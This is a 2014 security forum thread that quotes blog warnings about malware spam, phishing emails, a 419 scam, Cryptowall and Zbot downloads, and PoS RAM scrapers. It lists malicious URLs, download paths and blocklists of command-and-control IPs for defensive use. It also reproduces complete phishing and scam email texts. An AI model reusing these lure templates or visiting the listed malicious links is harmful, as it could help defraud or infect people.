2072 replies to this topic

[AplusWebMaster]

FYI...

Fake job offer SPAM - llcinc .net
- http://blog.dynamoo....-job-offer.html
11 Sep 2014 - "This -fake- company's name looks like it has been designed to be hard to find on Google. The so-called LLC INC using the domain llcinc .net does -not- exist.
    Date:      Wed, 10 Sep 2014 19:51:50 -0400 [09/10/14 19:51:50 EDT]
    From:      LLC INC
    Reply-To:      recruiter@ llcinc .net
    Subject:      EMPLOYMENT OFFER
    Hello,
      Good day to you overthere we will like to inform you that our company is currently
    opening an opportunity for employment if you are interested please do reply with your resume
    to recruiter@ llcinc .net
    Thanks
    Management LLC INC

This so-called job is going to be something like a money mule, parcel mule or some other illegal activity. The domain llcinc .net was registered just a few days ago with -fake- details... There is no website. The email originates from 209.169.222.37, the mail headers indicate that this is probably a compromised email server mail .swsymphony .org.
Avoid."
___

Fake eFax SPAM leads to Cryptowall
- http://blog.dynamoo....cryptowall.html
11 Sep 2014 - "Yet another -fake- eFax spam. I mean really I cannot remember the last time someone sent me a (real) fax...
From:     eFax [message@ inbound .efax .com]
Date:     11 September 2014 20:35
Subject:     eFax message from "unknown" - 1 page(s), Caller-ID: 1-865-537-8935
Fax Message [Caller-ID: 1-865-537-8935
You have received a 1 page fax at Fri, 12 Sep 2014 02:35:44 +0700.
* The reference number for this fax is atl_did1-1400166434-52051792384-154.
Click here to view this fax using your PDF reader.
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service! ...

... the link in the message goes somewhere bad, in this case it downloads a ZIP files from cybercity-game .com/game/Documents.zip which unzips to a malicious executable Documents.scr which has a pretty low VirusTotal detection rate of 2/55*. The ThreatTrack report** clearly identifies this as Cryptowall and identifies that it either downloads data from or posts data... The 111.exe has a much wider detection rate of 22/53*** and according the the ThreatTrack analysis of that binary there is some sort of network connection... I would recommend blocking the following:
188.165.204.210
193.19.184.20
193.169.86.151
goodbookideas .com
mtsvp .com
suspendedwar .com "
* https://www.virustot...sis/1410467960/

** http://www.dynamoo.c...20a381ad91f.pdf

*** https://www.virustot...sis/1410468901/
___

Malicious WordPress injection sending to 178.62.254.78 and 176.58.100.98
- http://blog.dynamoo....on-sending.html
11 Seo 2014 - "There is currently some sort of injection attack against WordPress sites that is injected code into the site's .js files. Not so unusual.. except that the payload site in the file changes every half hour or so... The site mentioned in the IFRAME is the one that keeps -changing- so presumably there is either something running on the compromised WordPress site, or there is some other mechanism for the bad guys to update the details... All these subdomains are hijacked from legitimate domains using AFRAID.ORG nameservers, and are hosted on 178.62.254.78 (Digital Ocean, Netherlands). These then pass the victim onto another domain in the format... blocking the following IPs may give you better protection:
176.58.100.98
178.62.254.78 "

176.58.100.98: https://www.virustot...98/information/

178.62.254.78: https://www.virustot...78/information/
___

Fake Employee Important Address UPDATE/SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
11 Sep 2014 - "'To All Employee’s –  Important Address UPDATE' which pretends to come from Administrator at your own domain is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     To All Employee’s:
    The end of the year is approaching and we want to ensure every employee receives their W-0 to the correct address. Verify that the address is correct... If changes need to be made, contact HR .. Administrator ...

11 September 2014: Documents.zip: Extracts to: Documents.scr
Current Virus total detections: 0/53* ...  another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
*https://www.virustot...sis/1410456657/

- http://blog.dynamoo....nt-address.html
11 Sep 2014 - "This -fake- HR spam leads to a malicious ZIP file:
From:     Administrator [administrator@ victimdomain .com]
    Date:     11 September 2014 22:25
    Subject:     To All Employee's - Important Address UPDATE
    To All Employee's:The end of the year is approaching and we want to ensure every employee receives their W-5 to the correct address. Verify that the address is correct... If changes need to be made, contact HR...

The link in the email goes to the same site as described in this earlier post*, which means that the payload is Cryptowall."
* http://blog.dynamoo....cryptowall.html
___

Fake picture or video SPAM – jpg malware
- http://myonlinesecur...ke-jpg-malware/
11 Sep 2014 - "'A new picture or video' message pretending to come from getmyphoto@ vodafone .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The attachment file names are so far all the same and it extracts to a fake windows short cut file .pif Even setting show file extensions will, not show the .pif extension in windows 8  and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecur...not-showing.png
The email looks like:
    You have received a picture message from mobile phone number +447586595142 picture
    Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service

There is a second version of this email doing the rounds today. Instead of an attachment it has a link to a compromised/ infected/newly created malware pushing site where it automatically tries to download the malware in a zip file.
You have received a picture message from mobile phone number +447557523496 click here to view picture message
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service

... there will be hundreds of different sites. The  zip was 90837744-2014_481427.zip which extracts to 90837744-2014_481427.scr which has the same #  and detection rate as the pif file earlier submitted to virus total*

11 September 2014: IMG_00005_09112014.jpeg.zip : Extracts to:    IMG_00005_09112014.jpeg.pif
Current Virus total detections:4/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410430034/

** https://www.virustot...sis/1410427007/
___

Fake 'new order' SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
11 Sep 2014 - "'new order' pretending to come from random names at live .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has various subjects, including new order, new invoice, FWD:invoice, FWD Order... The attachment file names are so far all the same and it extracts to a -fake- windows short cut file .pif . Even setting show file extensions will -not- show the .pif extension in windows 8  and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecur...not-showing.png
The email looks like:
Warmest regards,
> http://myonlinesecur...9/new-order.png

11 September 2014: 2014.09.11.zip : Extracts to:    2014.09.11.pdf.pif
Current Virus total detections: 4/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustot...sis/1410427007/
 

//

Edited by AplusWebMaster, 11 September 2014 - 08:25 PM.

[AplusWebMaster]

FYI...

Fake Invoice SPAM - contains malicious VBS script
- http://blog.mxlab.eu...ous-vbs-script/
Sep 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “[COPIE FACTURE SOCIETE LWS FC-408185] – [LWS INVOICE] 10/09/2014″. This email is sent from the spoofed address “Service clients LWS <noreply@ lws .com>” and has the following body:
S.A.R.L LWS
4, rue galvani
75838 PARIS Cedex 17
Paris le, 10/09/2014
Veuillez trouver en pièce jointe votre facture de référence: facture FC-408185 (Fichier: facture-408185) au format ZIP.
Si vous n’avez pas WinRar (Logiciel permettant de lire les fichiers ZIP) vous pouvez le télécharger ici:
http ://www .rarlab .com/download.htm
Merci pour la confiance que vous nous accordez,
Le service comptabilité LWS ...

The attached ZIP file has the name FACTURE_45871147.zip and contains the 4 kB large file FACTURE_45871147.vbs. the VBS script in fact is encoded to hide the real purpose but it seems that this script will download other malicious files and will install them on a system in order to infect the computer. The trojan is known as Trojan.Script.Crypt.deehcf or VBS/Dloadr-DVY. At the time of writing, 2 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustot...196a5/analysis/
___

Fake Household Improvement SPAM - Zbot Malware
- https://blog.malware...h-zbot-malware/
Sep 12, 2014 - "... malicious email in circulation at the moment which claims to contain an invoice from a Kitchen Appliance company. According to another recipient of the mail*, the named company is actually a real business entity although there’s no suggestion that they’ve been hacked or otherwise compromised – it seems the scammers just opened up a directory, said “That one” and just started pretending to be them. The mail reads as follows:
Screenshot: https://blog.malware...9/kitchens1.jpg
... The email comes with a .zip attachment, which contains a piece of Malware known as Zbot.  Zeus (aka Zbot) is something to be avoided, as it can lead to banking password theft, form grabbing, keystroke logging and also Ransomware. The zip contains an executable made to look like a Word .doc file, which is a trick as old as the hills yet extremely effective where catching people out is concerned. Telling Windows to display known file extensions will help to avoid this particular pitfall... we detect this as Trojan.Spy.Zbot, and the current Virus Total scores currently clock in at 29/54**...  there’s another mail*** doing the rounds which spoofs the same email address mentioned above, yet claims to be sent from a toiletries company. If you’ve bought any form of kitchen / household upgrade or addition recently and receive mails with zipped invoices, you may not recall exactly who you bought all of your items from. With that in mind, you may wish to have a look at your receipts and bank statements, and – on the off chance the randomly selected company named in the spam mails matches up – give them a call directly to confirm they really did send you something. There’s a good chance they probably didn’t..."
* http://myonlinesecur...rd-doc-malware/

** https://www.virustot...14f73/analysis/

*** http://blog.mxlab.eu...ontains-trojan/
___

Data Breaches and PoS RAM Scrapers
- http://blog.trendmic...s-ram-scrapers/
Sep 11, 2014 - "... Ever since the Target data breach came into the limelight, there has been a constant stream merchants/retailers publicly disclosing data breach incidents. These data breaches typically involve credit card data theft using PoS RAM scrapers. Early this month, Brian Krebs reported yet another big data breach that involves U.S. retailer Home Depot using a new variant of the BlackPOS PoS RAM scraper. Nearly all Home Depot locations in the US are believed to have been affected and it is speculated this data breach might surpass the Target breach in terms of volume of data stolen. In addition to an increased number of data breaches, 2014 also brings an increase in the number of new PoS RAM scraper families. Our PoS RAM scraper family tree illustrates the evolution as follows:
Evolution of the PoS RAM scraper family
> http://blog.trendmic...Figure-3-01.png
... Of the six new variants discovered in 2014, four were discovered between June and August.
- Soraya – discovered in June and is a Dexter- and ZeuS-inspired malware. In addition to scraping RAM for credit card Tracks 1 and 2 data, it borrows tricks from ZeuS for hooking the NtResumeThread API, and injects itself into all new processes. It also borrows ZeuS’s form-grabbing functionality and hooks the browser’s HTTP POST function. Trend Micro detects Soraya variants as TSPY_SORAYA.A.
- BrutPOS – discovered in July and appears to have borrowed functionality from a BlackPOS variant. It attempts to exploit PoS systems that use weak or default passwords and has open Remote Desktop Protocol (RDP) ports. BrutPOS will brute-force the login:password combinations to gain entry into the system. Trend Micro detects BrutPOS variants as TROJ_TIBRUN.B and TROJ_TIBRUN.SM.
- Backoff – discovered in July is a successor of Alina. It implements an updated data search function and drops a watchdog process that ensures Backoff is always running on the system. The cybercriminals use publicly available tools to brute-force entry into RDP applications on PoS systems and installs Backoff. Trend Micro detects Backoff variants as TSPY_POSLOGR.A, TSPY_POSLOGR.B, and TSPY_POSLOGR.C.
- BlackPOS ver 2.0 – discovered in August, clones the exfiltration technique that the BlackPOS variant used to compromise U.S. retailer Target. BlackPOS ver 2.0 also adds a unique feature where it pretends to be an AV product installed on the system to avoid drawing unwanted attention to itself. Reports indicate that this malware appears to have been used in the latest big data breach targeting Home Depot. Trend Micro detects BlackPOS ver 2.0 variants as TSPY_MEMLOG.A..."
 

 

Edited by AplusWebMaster, 12 September 2014 - 08:44 AM.

[AplusWebMaster]

FYI...

Phish - Paypal ...
- http://myonlinesecur...-hear-phishing/
14 Sep 2014 - "'Paypal Your account will be limited until we hear from you' pretending to come from service_paypal=cczazmam .com@ wpengine .com; on behalf of; service_paypal@ cczazmam .com. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card... The original email looks like this. It will NEVER be a genuine email from  PayPal or Your Bank so don’t ever follow the links in the email...
    PayPal account information :
    Hello,
    Dear PayPal user ,
    Your account will be limited if you not confirm it .
    Need Assistance?
    Some information on your account appears to be missing or incorrect.
    Please update your account promptly so that you can continue to enjoy
    all the benefits of your PayPal account.
    If you don’t update your account within 37 days, we’ll limit what you can do with your PayPal account.
    Please Login to confirm your information :
    http ://rangeviewrentals .com//wp-content/themes/twentytwelve/wester.html
    Reference Number: PP-003-211-347-423
    Yours sincerely,
    PayPal

This particular phishing campaign starts with an email with a link. In this case to a hacked compromised website, which looks nothing like any genuine PayPal page:
> http://myonlinesecur...ishing-scam.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details and your email log in details . Many of them are also designed to specifically steal your facebook and other social network log in details..."
 

 

[AplusWebMaster]

FYI...

Fake Termination SPAM – malware
- http://myonlinesecur...lation-malware/
15 Sep 2014 - "There can’t be a much more alarming email to open first thing on a Monday Morning than one that pretends to say that you have been fired... 'Termination due to policy violation #33205939124' pretending to come from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Today’s email template  attaches an arj file. This sort of compressed file is rarely used nowadays and many popular zip file programs will not automatically extract them. -Any- email received with an ARJ attachment should be immediately -deleted- . NO legitimate company or program ever uses that form of compression nowadays. To make it even harder to quickly detect, all the attachments are randomly named and extract to a different randomly named file and each one has a totally different SH1 or MD5#. Loads of slightly different subjects with this one, including
    Policy violation #59892665326
    Termination due to policy violation #33205939124
    Termination #59147901198
All the alleged infringements or violations have different numbers... The email looks like:
     Hello,
    We regret to inform you that your employment with A&M Defence & Marine Services Ltd is being terminated. Your termination is the result of the following violations of company policy:
    - 0A4 44 12.09.2011
    - 0A4 46 12.09.2011
    - 0A4 85 12.09.2011
     You were issued written warnings on 19.08.2014. As stated in your final warning, you needed to take steps to correct your behavior by 15.09.2014. Your failure to do so has resulted in your termination. To appeal this termination, you must return written notification of your intention to appeal to Wynona Kinnare in A&M Defence & Marine Services Ltd no later than 06:00PM on 21.09.2014.
     Sincerely,
    Pauletta Stephens ...

15 September 2014: disturbance_2014-09-15_08-38-12_33205939124.arj:
Extracts to:  disturbance_2014-09-15_08-38-12_33205939124.exe
Current Virus total detections: 3/53* . This 'Termination due to policy violation #33205939124' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...4c4ef/analysis/
... Behavioural information
TCP connections:
187.45.193.139: https://www.virustot...39/information/
213.186.33.87: https://www.virustot...87/information/
23.62.99.33: https://www.virustot...33/information/
66.96.147.117: https://www.virustot...17/information/
UDP communications:
137.170.185.211: https://www.virustot...11/information/
___

LinkedIn feature exposes Email Addresses
- http://krebsonsecuri...mail-addresses/
Sep 15, 2014 - "One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing... According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users... Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information... In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses..."
(More at the krebsonsecurity URL above.)
___

Fake Overdue invoice SPAM - malicious .arj attachment  
- http://blog.dynamoo....0-spam-has.html
15 Sep 2014 - "This -fake- invoice email has a malicious attachment:
    From:     Mauro Reddin
    Date:     15 September 2014 10:32
    Subject:     Overdue invoice #6767390
    Morning,
    I was hoping to hear from you by now. May I have payment on invoice #84819995669 today please, or would you like a further extension?
    Best regards,
    Mauro Reddin ...

The attachment is an archive file invc_2014-09-15_15-07-11_6767390.arj so in order to get infected you would need an application capable of handling ARJ archives. Once unpacked, there is a malicious executable called invc_2014-09-15_15-07-11_88499270.exe which has a VirusTotal detection rate of just 1/55*... recommend that you apply the following blocklist (Long list at the dynamoo URL above.) ..."
* https://www.virustot...sis/1410773681/
___

Fake Sage 'Outdated Invoice' SPAM ...
- http://blog.dynamoo....ce-spam_15.html
15 Sep 2014 - "... another -fake- Sage email leading to malware:

Screenshot: http://4.bp.blogspot.../s1600/sage.png

... This ZIP file contains a malicious executable Invoice18642.scr which has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows that it attempts to communicate with the following resources:
188.165.204.210/1509uk1/NODE01/0/51-SP3/0/
188.165.204.210/1509uk1/NODE01/1/0/0/
green-fuel .us/upload/box/1509uk1.ltc
www .green-fuel .us/upload/box/1509uk1.ltc
Recommended blocklist:
188.165.204.210
green-fuel .us
petitepanda .net
florensegoethe .com.br
coursstagephoto .com
vicklovesmila .com
flashsavant .com"
* https://www.virustot...sis/1410779812/
___

Fake 'secure' NatWest SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
15 Sep 2014 - "'You have received a new secure message from NatWest' pretending to come from NatWest <secure@natwest.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
[ NatWest logo ]
You have a new private message from NatWest
To view/read this your secure message please click here
Email Encryption Provided by NatWest. Learn More.
Email Security Powered by Voltage IBE
Copyright 2014 National Westminster Bank Plc. All rights reserved.
Footer Logo NatWest
To unsubscribe please click here ...
    
15 September 2014: SecureMessage.zip ( 8kb) : Extracts to:   SecureMessage.scr
Current Virus total detections: 1/55* . This 'You have received a new secure message from NatWest' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410779812/

- http://threattrack.t...re-message-spam
Sep 15, 2014
Screenshot: https://gs1.wac.edge...Zu2c1r6pupn.png
___

Phish - LLoyds 'Secure' SPAM...
- http://myonlinesecur...ssage-phishing/
15 Sep 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- New Secure Message
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account  from a foreign IP address
- Confirmation of Order
This one is 'LLoyds bank New Secure Message' pretending to come from Eli.Ray@ lloydsbank .com or David.Ricard@ lloydsbank .com... Email looks like:
[ Lloyds TSB logo ]     
    (New users may need to verify their email address)
    If you do not see or cannot click “Read Message” / click here
    Desktop Users:
    You will be prompted to open (view) the file or save (download) it to your computer. For best results, click Read Message button.
    Mobile Users:
    Install the mobile application.
    Protected by the Voltage SecureMail Cloud
    SecureMail has a NEW LOOK to better support mobile devices!
    Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender...

Screenshot: http://myonlinesecur...ure_message.png

This one wants your personal details and bank details..."
___

Fake Fax SPAM - malware attachment
- http://myonlinesecur...ke-pdf-malware/
15 SEP 2014 - "'You have received a fax' pretending to come from fax .co.uk <fax@ documents55 .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    You have received a new fax. This fax was received by Fax Server.
    The fax has been downloaded to dropbox service (Google Inc).
    To view your fax message, please download from the link below. It’s
    operated by Dropbox and safety...
    Received Fax Details
    Received on:1 5/09/2014 10:14 AM
    Number of Pages: 1 ...

15 September 2014: Docs0972.zip ( 8kb): Extracts to:  Docs0972.scr
Current Virus total detections: 0/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410804563/
___

Twitch users shook by money spending malware
- http://www.theinquir...pending-malware
15 Sep 2014 - "... F-Secure has warned gamers that the Twitch video streaming service has been hit with malware that can spend users' money. The firm revealed its concerns in a blog post on Friday*, shining a dark light on the new gaming console darling and its role in the world of Steam. F-Secure said that an alarmed Twitch user - not Amazon - approached it with some concerns, explaining that a lure in the Twitch chat feature offers access to a raffle. We all know what can and usually does follow the clicking an unsolicited link, and that is the start of a one-way trip to malware. This link, which purports to offer gaming gewgaws, is yet another lie, said F-Secure. It explained that a "Twitch-bot" account "bombards" the chat feature and tickles users with its lure..."
More detail here:
* http://www.f-secure....s/00002742.html
 

 

Edited by AplusWebMaster, 15 September 2014 - 02:41 PM.

[AplusWebMaster]

FYI...

Fake 'Payments' SPAM ...
- http://blog.mxlab.eu...rding-payments/
Sep 16, 2014 - "...  intercepted different campaigns where the trojan Gen:Variant.Graftor.155439 is present in the attached ZIP archive. The trojan is known as Gen:Variant.Graftor.155439 by most AV engines but it’s also known as Trojan/Win32.Zbot, HW32.Paked.1F59, Generic-FAUS!BA7599C952BE or PE:Malware.XPACK-HIE/Heur!1.9C48. The first email comes with the subject “Re: today payment done” is sent from a spoofed address and has the following body:
    Dear sir,
    Today we have able to remit the total amount of US$ 51,704.97 to your account. Details of our payments are as follows:
    Cont. #41 SPV001/APR/13 US$34,299.13 – 11,748.82 (50% disc. For R008 & R016) =
    Cont. #42 EXSQI013/MAY/13 US$29,154.66
    Total Remittance: US$ 51,704.97
    Attached is the TT copy, check with your bank and let us know when you will proceed with shipment.
    Thank you very much.
    Best regards,
    Me

The attached ZIP file has the name swift copy.zip and contains the swift copy.scr file. At the time of writing, 11 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustot...6c686/analysis/
The second email comes with the subject “Re: Balance payment” is sent from a spoofed address and has the following body:
    The attached TT copy is issued at the request of our customer. The advice is for your reference only.
    Yours faithfully,
    Global Payments and Cash Management
    Bank of America (BOA)
    This is an auto-generated email, please DO NOT REPLY. Any replies to this
    email will be disregarded...

The attached ZIP file has the name original copy.zip and contains the original copy.scr file. At the time of writing, 12 of the 55 AV engines did detect the trojan at Virus Total**..."
** https://www.virustot...c1635/analysis/
___

Fake 'My new photo ;)' SPAM - malware attachment
- http://blog.mxlab.eu...zzor-2o-trojan/
Sep 16, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “My new photo ”. This email is sent from a spoofed address and has the following short body in very poor English:
    my new photo
    if you like my photo to send me u photo

The attached ZIP file has the name photo.zip, once extracted a folder photo is available with that contains the 127 kB large file photo.exe. The trojan is known as a variant of Trojan.Win32.Swizzor.2!O. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustot...817cb/analysis/
... Behavioural information
TCP connections:
131.253.40.1: https://www.virustot....1/information/
137.254.60.32: https://www.virustot...32/information/
134.170.188.84: https://www.virustot...84/information/
157.56.121.21: https://www.virustot...21/information/
91.240.22.62: https://www.virustot...62/information/
___

Fake USPS SPAM - word doc malware
- http://myonlinesecur...rd-doc-malware/
16 Sep 2014 - "'USPS Postal Notification Service' pretending to come from USPS  is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecur...ion-service.png

16 September 2014: Label.zip ( 82 kb): Extracts to:  Label.exe             
Current Virus total detections: 20/54* . This USPS Postal Notification Service is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410841682/
___

Fake 'inovice' SPAM ...
- http://blog.dynamoo....ember-spam.html
16 Sep 2014 - "This spam mis-spells "invoice" in the subject line, and has an .arj file attached that contains a malicious binary.
Example subjects:
inovice 8958508 September
inovice 7682161 September
inovice 4868431 September
inovice 0293991 September
Body text:
This email contains an invoice file attachment

The name of the attachment varies, but is in the format invoice_8958508.arj which contains a malicious executable invoice_38898221_spt.exe which has a VirusTotal detection rate of just 3/54*. The ThreatTrack report...and Anubis report show a series a DGA domains... that are characteristic of Zbot, although none of these domains are currently resolving. If your organisation can -block-  .arj files at the mail perimeter then it is probably a good idea to do so."
* https://www.virustot...sis/1410860283/
... Behavioural information
TCP connections:
208.91.197.27: https://www.virustot...27/information/
___

Fake FAX SPAM... again
- http://blog.dynamoo....w-fax-spam.html
16 Sep 2014 - "... a facsimile transmission...
From:     Fax
Date:     16 September 2014 11:05
Subject:     You've received a new fax
New fax at SCAN0204102 from EPSON by ...
Scan date: Tue, 16 Sep 2014 15:35:59 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can download your fax message at: ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...

The link is so obviously not anything to do with Google. Clicking on it loads another script from triera .biz.ua/twndcrfbru/zjliqkgppi.js which in turn downloads a ZIP file from www .yerelyonetisim .org.tr/pdf/Message_2864_pdf.zip which has a VirusTotal detection rate of 3/55*. This malware then phones home... Recommended blocklist:
188.165.204.210
brisamarcalcados .com.br
triera .biz.ua
yerelyonetisim .org.tr
ngujungwap .mobi.ps "
* https://www.virustot...sis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
198.143.152.226: https://www.virustot...26/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake forgeries 'Copied invoices' SPAM
- http://blog.dynamoo....oices-spam.html
16 Sep 2014 - "Kifilwe Shakong is a real person who works for Cashbuild in South Africa. She is  not the person sending these messages, they are forgeries. Cashbuild's systems have not been compromised in any way. As you might guess, these messages have a malicious attachment.
From:     Kifilwe Shakong [kshakong@ cashbuild .co.za]
Date:     16 September 2014 12:17
Subject:     Copied invoices
The attached invoices are copies. We will not be able to pay them. Please send clear invoices.
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http ...
The attached invoices are copies. We will not be able to pay them. Please send clear invoices...

Attached is a file with a filename in the format SKMBT_75114091015230.zip which in turn contains a malicious executable SKMBT_75114091015230.exe which has a very low detection rate at VirusTotal of just 1/54*... the malware attempts to phone home to the following domains and IPs which are worth blocking:
golklopro .com
94.100.95.109
31.134.29.175
176.213.10.114
176.8.72.4
176.99.191.49
78.56.92.46
195.114.159.232
46.98.234.76
46.185.88.110
46.98.122.183
46.211.198.56
195.225.147.101
176.53.209.231 ..."
(More detail at the dynamoo URL above.)
* https://www.virustot...sis/1410866733/
... Behavioural information
DNS requests
golklopro .com
cosjesgame .su
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Unpaid invoice' SPAM - leads to Angler Exploit Kit
- http://blog.dynamoo....spam-leads.html
16 Sep 2014 - "This convincing-looking but -fake- spam leads to an exploit kit.
    From:     Christie Foley [christie.foley@ badinsky .sk]
    Reply-to:     Christie Foley [christie.foley@ badinsky .sk]
    Date:     16 September 2014 13:55
    Subject:     Unpaid invoice notification ...

Screenshot: https://1.bp.blogspo...600/invoice.png

The link in the email goes to:
[donotclick]tiragreene .com/aspnet_client/system_web/4_0_30319/invoice_unn.html
Which in turn goes to an Angler EK landing page at:
[donotclick]108.174.58.239:8080 /wn8omxftff
You can see the URLquery report for the EK here*. I would strongly recommend blocking web traffic to 108.174.58.239 (ColoCrossing, US)."
* http://urlquery.net/...d=1410873578924

- http://myonlinesecur...xploit-malware/
16 Sep 2014
___

Fake 'PAYMENT SCHEDULE' email -  419 SCAM
- http://myonlinesecur...ngozi-o-iweala/
16 Sep 2014 - "'RE:YOUR PAYMENT SCHEDULE' pretending to come from Dr Mrs Ngozi O. Iweala is a -scam- . After all the current batches of very nasty and tricky malware being attached to emails or as links in emails, it really is a change to see a good old fashioned 419 scam:
    Attn:Beneficiary,
     My name is Mrs Ngozi Okonjo Iweala,I am the current minister of finance of Nigeria.
     Your payment file has been in our desk since two weeks ago and Mr.Croft from Australia submitted claims on your funds stating that
    you have given him the authority to claim the funds but we stopped him first until we receive a confirmation from any of you. You are
    therefore requested to get back to us to confirm the authenticity of the application of claim submitted by Mr Croft or if you did not
    authorized him for any reason,urgently get back to us so that we can direct you on how you are going to receive your fund via Automated
    Teller Machine System( ATM CARD).
     Please,response back with all your full details mostly your confidential address where you will have the ATM card delivered to you. Your urgent response is highly needed.
     Reply also to : fminister88 @gmail .com
     Your faithfully.
     Dr Mrs Ngozi O. Iweala.
    Finance Of Minister.

[Arrgghh...]
___

Fake Nat West SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
16 Sep 2014 - "'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     We have arranged a BACS transfer to your bank for the following amount : 4933.00
    Please find details at our secure link below: ...

This is another version of the same upatre zbot downloaders that have been spammed out today with exactly the same payload as 'NatWest You have a new Secure Message – file-4430 – fake PDF malware'*. This 'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecur...ke-pdf-malware/

- https://www.virustot...sis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
198.143.152.226: https://www.virustot...26/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Dhl Delivery' SPAM - contains trojan
- http://blog.mxlab.eu...ontains-trojan/
Sep 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject 'Fwd: Dhl Delivery Attempt (Invoice Documents)'. This email is sent from the spoofed address 'enquiry@ dhl .com' and has the following body:
    We attempted to deliver your item at 17:32pm on Sept 15th, 2014.
    The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically generated.
    You may rearrange delivery by visiting the link on the attached document or pick up the item at the DHL depot/office indicated on the receipt attached.
    If the package is not rescheduled for delivery or picked up within 48 hours, it will be returned to the sender.
    Airway Bill No: 7808130095
    Class: Package Services
    Service(s): Delivery Confirmation
    Status: eNotification sent
    Print this label to get this package at our depot/office.
    Thank you
    © 2014 Copyright© 2013 DHL. All Rights Reserved...

